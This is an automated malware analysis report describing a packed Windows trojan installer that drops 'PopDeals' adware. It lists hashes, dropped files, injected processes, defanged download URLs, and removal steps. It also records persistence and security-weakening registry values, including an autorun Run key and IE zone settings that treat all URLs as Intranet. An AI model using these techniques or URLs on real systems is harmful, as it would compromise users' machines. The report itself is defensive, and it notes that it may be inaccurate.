Trojan.Win32.Bumat.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: bb40adb1c65eca29fcea4c28fd839b08
SHA1: ff91ef08e780300c584d65681c1b8832c409c737
SHA256: 84794cd975bde9bcb2de8da70c7ee53b0694442f104cf947118f6c9fb9f8026d
SSDeep: 6144:zkc2ocwuGVXd4hPYMnXPuB 87DeOboY6grEBry0oXmUrpuC55n8mDv5z9CdO1Wi9:oyOwePYMfuBF7DeGoYXCzOm8uCvTDv c
Size: 381008 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPXv0896v102v105v122Delphistub, UPolyXv05_v6
Company: Unilogic Informatica Ltda ME
Created at: 2014-11-28 06:34:20
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
miB2.tmp:1300
PopDeals.exe:2352
The Trojan injects its code into the following process(es):
%original file name%.exe:1624
PopDeals.exe:1612
Mutexes
The following mutexes were created/opened:
c:!documents and settings!adm!local settings!history!history.ie5!mshist012015011720150118!_!SHMSFTHISTORY!_CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003RasPbFileWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_ShimCacheMutexZonesLockedCacheCounterMutexZonesCounterMutexZonesCacheCounterMutex
File activity
The process %original file name%.exe:1624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\miB2.tmp (7713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\round-productInfo[1].png (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\popdeals3[1].exe (13413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\button-progress[1].gif (404 bytes)
%Documents and Settings%\%current user%\Desktop\Minecraft.lnk (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAMFCX4D.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CA274TEJ.htm (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\feedback[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bg-secure[1].png (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hotwords.com[1].txt (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\button-green[1].png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\button-gray[1].png (621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CADOWN9L (1996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CASXEVEB (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA9CZEVH.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\default[1].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\feedback[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOTOLW7.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAU3KTY5 (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CADTR3EW (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\270596[1].png (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CA274TEJ.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\miB2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\feedback[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOTOLW7.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\feedback[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021120130218 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAU3KTY5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CASXEVEB (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA9CZEVH.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013021820130225\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013030120130302\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CADTR3EW (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAMFCX4D.htm (0 bytes)
The process miB2.tmp:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\PopDeals\PopDeals.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E6B84D30E5F69CEB3278532D063D4504 (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\CC42971B7939A9CA55C44CFC893D7C1D (272 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\CC42971B7939A9CA55C44CFC893D7C1D (773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpB3.tmp (2952 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\3B6E683A7A45CC59BF035C9BA8C7AB9D (240 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\3B6E683A7A45CC59BF035C9BA8C7AB9D (494 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E6B84D30E5F69CEB3278532D063D4504 (236 bytes)
The process PopDeals.exe:2352 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\tmpB4.tmp (2780 bytes)
Registry activity
The process %original file name%.exe:1624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011720150118]
"CachePrefix" = ":2015011720150118:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011720150118]
"CacheLimit" = "8192"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011720150118]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012015011720150118\"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011720150118]
"CacheOptions" = "11"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A5 9F B2 D4 54 3D 93 6E CB E9 82 CF D5 96 91 39"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012015011720150118]
"CacheRepair" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013030120130302]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021120130218]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013021820130225]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process miB2.tmp:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals]
"NoModify" = "1"
"DisplayVersion" = "1.0.2.2"
"Publisher" = "PopDeals"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\PopDeals]
"SubChannel" = ""
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\PopDeals]
"PopDeals.exe" = "Windows Bargain Application"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\PopDeals]
"Product" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals]
"VersionMajor" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\PopDeals]
"partner" = "1"
"Guid" = "4F4F-26A3-D0C54C74-88B1-411DD9BF0B6D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals]
"NoRepair" = "1"
"DisplayName" = "Windows Bargain Application"
[HKLM\SOFTWARE\PopDeals]
"channel" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals]
"EstimatedSize" = "127"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 86 56 73 D9 38 E0 F3 29 07 E5 33 A9 87 10 35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PopDeals]
"UninstallString" = "%Program Files%\PopDeals\PopDeals.exe uninstall"
"VersionMinor" = "0"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"PopDeals" = "%Program Files%\PopDeals\PopDeals.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The process PopDeals.exe:2352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 1C 26 FF 44 1A F3 EB A8 4C B1 AD A4 23 C7 BF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The process PopDeals.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF BB 06 79 12 A8 55 E1 82 5B EA 36 7F DD F7 E6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
Dropped PE files
MD5 | File path |
---|---|
a6d3c67098fa93c9d3aa67f9d531b092 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\tmpB3.tmp |
922ccfe61d4122e1efacdd00eb4404ed | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\popdeals3[1].exe |
922ccfe61d4122e1efacdd00eb4404ed | c:\Program Files\PopDeals\PopDeals.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
miB2.tmp:1300
PopDeals.exe:2352 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\miB2.tmp (7713 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\round-productInfo[1].png (426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\popdeals3[1].exe (13413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\button-progress[1].gif (404 bytes)
%Documents and Settings%\%current user%\Desktop\Minecraft.lnk (838 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAMFCX4D.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CA274TEJ.htm (341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\feedback[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\bg-secure[1].png (6 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hotwords.com[1].txt (264 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\button-green[1].png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\button-gray[1].png (621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\CADOWN9L (1996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CASXEVEB (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA9CZEVH.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\default[1].css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\feedback[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOTOLW7.htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAU3KTY5 (20 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (964 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CADTR3EW (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\270596[1].png (2 bytes)
%Program Files%\PopDeals\PopDeals.exe (601 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E6B84D30E5F69CEB3278532D063D4504 (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\CC42971B7939A9CA55C44CFC893D7C1D (272 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\CC42971B7939A9CA55C44CFC893D7C1D (773 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpB3.tmp (2952 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\3B6E683A7A45CC59BF035C9BA8C7AB9D (240 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\3B6E683A7A45CC59BF035C9BA8C7AB9D (494 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E6B84D30E5F69CEB3278532D063D4504 (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpB4.tmp (2780 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"PopDeals" = "%Program Files%\PopDeals\PopDeals.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Unilogic Informatica Ltda ME
Product Name: Instalador
Product Version: 1.5
Legal Copyright: Copyright (C) 2014 Unilogic Informatica Ltda ME
Legal Trademarks: Copyright (C) 2014 Unilogic Informatica Ltda ME
Original Filename: Instalador
Internal Name: Instalador
File Version: 1.5.1.2
File Description: Instalador
Comments: Instalador MultiInstall
Language: English (United States)
Company Name: Unilogic Informatica Ltda MEProduct Name: Instalador Product Version: 1.5 Legal Copyright: Copyright (C) 2014 Unilogic Informatica Ltda MELegal Trademarks: Copyright (C) 2014 Unilogic Informatica Ltda MEOriginal Filename: InstaladorInternal Name: InstaladorFile Version: 1.5.1.2File Description: InstaladorComments: Instalador MultiInstallLanguage: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 729088 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 733184 | 360448 | 357888 | 5.47781 | ea2a3eac4a2593e311929a2b16b1dbd7 |
.rsrc | 1093632 | 20480 | 19968 | 3.45112 | fc6899c25e18e9b09e81dd321eeae1a1 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://multinstall.com.br/start?s1=69645f65783d33373337323739352669645f6c633d313126444c5645523d312e352e312e302641444d494e3d31264f535f56455253494f4e3d57696e646f777320585026535041434b3d2053657276696365205061636b2033264f535f4c414e47554147453d456e676c69736826424954533d3332264d41433d30303a30433a32393a36383a31373a424226564f4c3d4138413637413235 | |
hxxp://s3-website-sa-east-1.amazonaws.com/popdeals3.exe | |
hxxp://multinstall.com.br/start/?s1=69645f65783d33373337323739352669645f6c633d313126444c5645523d312e352e312e302641444d494e3d31264f535f56455253494f4e3d57696e646f777320585026535041434b3d2053657276696365205061636b2033264f535f4c414e47554147453d456e676c69736826424954533d3332264d41433d30303a30433a32393a36383a31373a424226564f4c3d4138413637413235 | |
hxxp://multinstall.com.br/css/v1412186757/gates/default.css | |
hxxp://multinstall.com.br/css/gates/images/button-progress.gif | |
hxxp://ultradownloads.com.br/270596.png | |
hxxp://tracking.hotwords.com.br/tracking.jsp?&networkId=BR&id=15772 | |
hxxp://multinstall.com.br/css/v1412186757/gates/images/bg-secure.png | |
hxxp://multinstall.com.br/css/v1412186757/gates/images/round-productInfo.png | |
hxxp://multinstall.com.br/css/v1412186757/gates/images/button-gray.png | |
hxxp://multinstall.com.br/css/v1412186757/gates/images/button-green.png | |
